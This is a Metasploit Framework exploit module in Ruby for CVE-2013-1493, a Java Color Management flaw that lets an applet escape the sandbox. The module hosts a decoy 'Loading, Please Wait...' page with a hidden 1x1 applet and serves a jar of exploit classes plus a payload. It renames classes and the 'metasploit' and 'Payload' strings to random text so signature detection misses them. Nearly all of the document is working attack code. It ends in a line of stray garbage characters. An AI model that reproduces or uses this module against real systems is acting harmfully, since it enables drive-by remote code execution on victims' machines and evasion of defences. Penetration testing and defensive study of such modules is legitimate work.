##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
require 'rex'
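class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The landing page is a plain <applet> tag; no JavaScript is needed to trigger it.
  autopwn_info({ :javascript => false })

  # Module metadata for the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # 'DefaultTarget' belongs in this metadata hash (the pasted listing had it
      # misplaced inside on_request_uri, where it is a syntax error).
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the pre-built class files from the framework data directory and
  # randomizes the name of the applet entry class before the HTTP server starts.
  #
  # @raise [Errno::ENOENT] if one of the class files is missing from install_root
  def setup
    @leak_class           = load_exploit_class("Leak.class")
    @buffered_image_class = load_exploit_class("MyBufferedImage.class")
    @color_space_class    = load_exploit_class("MyColorSpace.class")

    # The replacement has the SAME length as "Init" so the length-prefixed
    # entries inside the class file stay consistent. The jar entry name and the
    # <applet code=...> attribute both use this randomized name, so the served
    # archive never contains the literal "Init" class name.
    @init_class_name = rand_text_alpha("Init".length)
    @init_class      = load_exploit_class("Init.class").gsub("Init", @init_class_name)

    super
  end

  # HTTP dispatcher for the module's resource.
  #
  # Any *.jar request gets the applet archive; a request ending in "/" gets the
  # landing page (after a fresh payload has been generated for this client);
  # anything else is redirected to the resource root.
  #
  # @param cli [Rex::Socket] the connected client
  # @param request [Rex::Proto::Http::Request] the parsed HTTP request
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # regenerate_payload returns nil when a payload cannot be built for this
      # client; answer 404 rather than serving a page that references nothing.
      payload = regenerate_payload(cli)
      unless payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a 1x1 <applet> whose archive name is random per
  # request and whose code attribute is the randomized Init class name.
  #
  # @return [String] the HTML document as a single line
  def generate_html
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one of the module's pre-built class files as raw bytes.
  #
  # @param name [String] file name under data/exploits/cve-2013-1493/
  # @return [String] binary (ASCII-8BIT) file contents
  def load_exploit_class(name)
    File.binread(File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name))
  end

  # Assembles the applet archive: the encoded payload jar plus the four exploit
  # classes. The framework's literal "metasploit" / "Payload" markers are then
  # replaced, in entry names and entry bytes alike, by same-length random text,
  # so those fixed strings are not present in what is served to the client.
  #
  # @return [Rex::Zip::Jar] the archive, with its manifest rebuilt
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file("Leak.class", @leak_class)
    jar.add_file("MyBufferedImage.class", @buffered_image_class)
    jar.add_file("MyColorSpace.class", @color_space_class)

    # Same-length substitutions keep class-file length prefixes valid.
    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    end

    jar.build_manifest
    jar
  end
end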
) B" d3 G0 ]4 m7 i |